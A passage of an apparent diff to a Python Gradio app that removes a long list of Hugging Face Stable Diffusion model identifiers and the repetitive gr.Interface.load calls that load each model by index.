"Guizmus/SDArt_cosmichorrors", - "DGSpitzer/DGSpitzer-Art-Diffusion", - "stablediffusionapi/emotion-puppeteer-v2", - "stablediffusionapi/fengjing", - "stablediffusionapi/fuwafuwamix", - "Fred99774/girlnew1", - "stablediffusionapi/majicmixrealistic", - "badmonk/nxka", - "ItsJayQz/SynthwavePunk-v2", - "zhyemmmm/ToonYou", - "stablediffusionapi/uber-realistic-merge", - "stablediffusionapi/vne732h9dh4", - "stablediffusionapi/wand-magic2", - "stablediffusionapi/waifu-journey-2", - "stablediffusionapi/zovya", - - "Guizmus/SDArt_cosmichorrors768", - "stablediffusionapi/counterfeit-v30", - "stablediffusionapi/amireal", - #"JamesFlare/pastel-mix", #"andite/pastel-mix", - "stablediffusionapi/rev-anim", - 
"aipicasso/picasso-diffusion-1-1", - "xiaolxl/Gf_style2", - "circulus/sd-semireal-v2.8", - "Crosstyan/BPModel", #07.11 - - "digiplay/Dusk-1", - "ogkalu/Comic-Diffusion", - "Guizmus/SDArt_ChaosAndOrder768", - "gsdf/Counterfeit-V2.0", - "dwancin/memoji", #07.11 - "nousr/robo-diffusion-2-base", - - ##"hakurei/waifu-diffusion", - "WarriorMama777/AbyssOrangeMix2", - "stablediffusionapi/abyssorangemix2nsfw", #200 - "cag/anything-v3-1", - "iZELX1/Anything-V3-X", - "xyn-ai/anything-v4.0", #"andite/anything-v4.0", - "D1b4l4p/AsianMix", - #"Fred99774/chilloutvlara", - "aipicasso/cool-japan-diffusion-2-1-2", - "stablediffusionapi/corneos-7th-heaven-m", #196 - "DGSpitzer/Cyberpunk-Anime-Diffusion", - "stablediffusionapi/dark-sushi-mix", - "joachimsallstrom/Double-Exposure-Diffusion", - "eimiss/EimisAnimeDiffusion_1.0v", - "prompthero/funko-diffusion", - "nitrosocke/Ghibli-Diffusion", - ###"iZELX1/Grapefruit", - "xiaolxl/GuoFeng3", - "stablediffusionapi/tmnd-mix", - "coder119/Vectorartz_Diffusion", #203 - - "WarriorMama777/AbyssOrangeMix", - "AIARTCHAN/7pa", - "JosephusCheung/ACertainModel", - "JosephusCheung/ACertainThing", - "JosephusCheung/ACertainty", - "AIARTCHAN/AbyssHellVer3", - "AIARTCHAN/AbyssMapleVer3", - "stablediffusionapi/abyssorangemixsfw", - "AIARTCHAN/anidosmixV2", - "stablediffusionapi/anime-model-v2", - "kubanemil/AnyLORA", - "stablediffusionapi/hc-anything-v3-vae", #231 - "mm00/anything-v3.0-light", - "stablediffusionapi/anythingelse-v4", - "stablediffusionapi/anything-v45-fixed", - "stablediffusionapi/anything-v5", - "nitrosocke/Arcane-Diffusion", - "nitrosocke/archer-diffusion", - "stablediffusionapi/architecture-tuned-model", - "WarriorMama777/BloodOrangeMix", - "wavymulder/collage-diffusion", - "stablediffusionapi/camelliamixline", - "digiplay/chrysanthemumMix_v1", - "digiplay/CiderMix_ciderR", #260 - "Johnhex/Clam", #243 - "stablediffusionapi/cosmic-babes", - "digiplay/CoffeeDonut_v1", - "stablediffusionapi/dark-sushi-25d", - "digiplay/Defacta_v1_diffusers", #226 - ## "WarriorMama777/EerieOrangeMix", - "digiplay/DuelAnimeMix_v1", #225 - "Envvi/Inkpunk-Diffusion", - "digiplay/kotosmix_diffusers", #229 - "stablediffusionapi/meinaalter", - "Nacholmo/meinamixv7-diffusers", - "stablediffusionapi/meinapastel", - "AIARTCHAN/MIX-Pro-V4", - "stablediffusionapi/shirataki-mix", #191 - "NoCrypt/SomethingV2_2", - "NoCrypt/SomethingV2", - "badmonk/sxzumi", - ## "stablediffusionapi/three-delicacy", - ## "stablediffusionapi/three-delicacy-wonto", - "etherealxx/systemy-csrmodel-cutesexyrobutts", #"andite/cutesexyrobutts-diffusion", - "sd-dreambooth-library/true-guweiz-style", # "andite/guweiz-diffusion", - "stablediffusionapi/vector-art", #198 - "digiplay/xxMix_4", - ###"mio/hiten", #"andite/hiten-diffusion", - ### "andite/mashuu-diffusion", - ### "andite/mignon-diffusion", - ### "andite/mikapikazo-diffusion", - ### "andite/piromizu-diffusion", - "digiplay/Zevinemix_v1.0/", - - "digiplay/AnaMix_v2", #07.11 - "stablediffusionapi/animetestmodelv3", - "yulet1de/anything", #232 - "hakurei/artstation-diffusion", #07.11 - "Fictiverse/Stable_Diffusion_BalloonArt_Model", - "stablediffusionapi/bg-dream-irl", - "stablediffusionapi/bg-dream-model-b", #193 - "Rardilit/Ciffusion_v0.1", - "circulus/sd-anireal-2d-v2", - "circulus/sd-photoreal-v2.7", - "circulus/sd-photoreal-photo-v2", - "circulus/sd-anireal-2.5d-v2", - "circulus/sd-anireal-v2.5", - "circulus/sd-photoreal-semi-v2", - "circulus/sd-photoreal-real-v2", - "circulus/sd-photoreal-v2.5", - "circulus/sd-anireal-3d-v2", - "circulus/sd-anireal-v2.8", - 
"nitrosocke/classic-anim-diffusion", - "Conflictx/Complex-Lineart", #245 - "sayakpaul/da-vinci-sd-pokemon", - "nitrosocke/elden-ring-diffusion", - "digiplay/EtherBluMix_1", #07.11 - "digiplay/fantasticmix_v40_test", #261 - "theintuitiveye/FantasyMix", - "Fictiverse/Stable_Diffusion_FluidArt_Model", - "nitrosocke/Future-Diffusion", - "ItsJayQz/GTA5_Artwork_Diffusion", #205 - "digiplay/hellopure_v2.23", - "TheLastBen/hrrzg-style-768px", #246 - "nevernotsean/IllustratedPaperMini", #242 - "dallinmackay/JWST-Deep-Space-diffusion", - "prompthero/linkedin-diffusion", - "mann-e/mann-e_4_rev-0-1", #210 - "ItsJayQz/Marvel_WhatIf_Diffusion", #206 - "yuanbit/max-15-1e-6-1500", - "MyneFactory/MF-Base", #248 - "Fictiverse/Stable_Diffusion_Microscopic_model", #249 - "nitrosocke/mo-di-diffusion", - "luongphamit/NeverEnding-Dream2", #241 - "lambdalabs/sd-naruto-diffusers", #201 - "Vernon-2/output_test", - "Fictiverse/Stable_Diffusion_PaperCut_Model", - "bsuutari/path_to_saved_model", - "bsuutari/path_to_saved_model_rafa", - "digiplay/PlanetBumix_v1", - "lambdalabs/sd-pokemon-diffusers", #202 - "prompthero/poolsuite-diffusion", - "digiplay/RealismEngine_v1", - "nitrosocke/redshift-diffusion", - "nitrosocke/redshift-diffusion-768", - "nousr/robo-diffusion", - "digiplay/SDVN1-Real_v1", #255 - "nitrosocke/spider-verse-diffusion", - #"runwayml/stable-diffusion-v1-5", - "nicky007/stable-diffusion-logo-fine-tuned", - "stablediffusionapi/three-delicacy", #233 - "stablediffusionapi/three-delicacy-wonto", #234 - "naclbit/trinart_stable_diffusion_v2", - "dallinmackay/Tron-Legacy-diffusion", - "digiplay/unstableDiffusersYamerMIX_v3", - "dallinmackay/Van-Gogh-diffusion", - "ItsJayQz/Valorant_Diffusion", - "Fictiverse/Stable_Diffusion_VoxelArt_Model", #204 - "wavymulder/wavyfusion", - "Yntec/HassanRemix", - "Yntec/Reddit", - "Yntec/CinematicReality", - "CompVis/stable-diffusion-v1-3", #207 - "CompVis/stable-diffusion-v1-2", #208 - "CompVis/stable-diffusion-v1-1", #209 -] -current_model = models[0] - -text_gen1=gr.Interface.load("spaces/daspartho/prompt-extend") -#text_gen1=gr.Interface.load("spaces/Omnibus/MagicPrompt-Stable-Diffusion_link") - -models2=[ - gr.Interface.load(f"models/{models[0]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[1]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[2]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[3]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[4]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[5]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[6]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[7]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[8]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[9]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[10]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[11]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[12]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[13]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[14]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[15]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[16]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[17]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[18]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[19]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[20]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[21]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[22]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[23]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[24]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[25]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[26]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[27]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[28]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[29]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[30]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[31]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[32]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[33]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[34]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[35]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[36]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[37]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[38]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[39]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[40]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[41]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[42]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[43]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[44]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[45]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[46]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[47]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[48]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[49]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[50]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[51]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[52]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[53]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[54]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[55]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[56]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[57]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[58]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[59]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[60]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[61]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[62]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[63]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[64]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[65]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[66]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[67]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[68]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[69]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[70]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[71]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[72]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[73]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[74]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[75]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[76]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[77]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[78]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[79]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[80]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[81]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[82]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[83]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[84]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[85]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[86]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[87]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[88]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[89]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[90]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[91]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[92]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[93]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[94]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[95]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[96]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[97]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[98]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[99]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[100]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[101]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[102]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[103]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[104]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[105]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[106]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[107]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[108]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[109]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[110]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[111]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[112]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[113]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[114]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[115]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[116]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[117]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[118]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[119]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[120]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[121]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[122]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[123]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[124]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[125]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[126]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[127]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[128]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[129]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[130]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[131]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[132]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[133]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[134]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[135]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[136]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[137]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[138]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[139]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[140]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[141]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[142]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[143]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[144]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[145]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[146]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[147]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[148]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[149]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[150]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[151]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[152]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[153]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[154]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[155]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[156]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[157]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[158]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[159]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[160]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[161]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[162]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[163]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[164]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[165]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[166]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[167]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[168]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[169]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[170]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[171]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[172]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[173]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[174]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[175]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[176]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[177]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[178]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[179]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[180]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[181]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[182]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[183]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[184]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[185]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[186]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[187]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[188]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[189]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[190]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[191]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[192]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[193]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[194]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[195]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[196]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[197]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[198]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[199]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[200]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[201]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[202]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[203]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[204]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[205]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[206]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[207]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[208]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[209]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[210]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[211]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[212]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[213]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[214]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[215]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[216]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[217]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[218]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[219]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[220]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[221]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[222]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[223]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[224]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[225]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[226]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[227]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[228]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[229]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[230]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[231]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[232]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[233]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[234]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[235]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[236]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[237]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[238]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[239]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[240]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[241]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[242]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[243]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[244]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[245]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[246]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[247]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[248]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[249]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[250]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[251]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[252]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[253]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[254]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[255]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[256]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[257]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[258]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[259]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[260]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[261]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[262]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[263]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[264]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[265]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[266]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[267]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[268]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[269]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[270]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[271]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[272]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[273]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[274]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[275]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[276]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[277]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[278]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[279]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[280]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[281]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[282]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[283]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[284]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[285]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[286]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[287]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[288]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[289]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[290]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[291]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[292]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[293]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[294]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[295]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[296]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[297]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[298]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[299]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[300]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[301]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[302]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[303]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[304]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[305]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[306]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[307]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[308]}",live=True,preprocess=False), - 
gr.Interface.load(f"models/{models[309]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[310]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[311]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[312]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[313]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[314]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[315]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[316]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[317]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[318]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[319]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[320]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[321]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[322]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[323]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[324]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[325]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[326]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[327]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[328]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[329]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[330]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[331]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[332]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[333]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[334]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[335]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[336]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[337]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[338]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[339]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[340]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[341]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[342]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[343]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[344]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[345]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[346]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[347]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[348]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[349]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[350]}",live=True,preprocess=False), - - gr.Interface.load(f"models/{models[351]}",live=True,preprocess=False), - gr.Interface.load(f"models/{models[352]}",live=True,preprocess=False), - 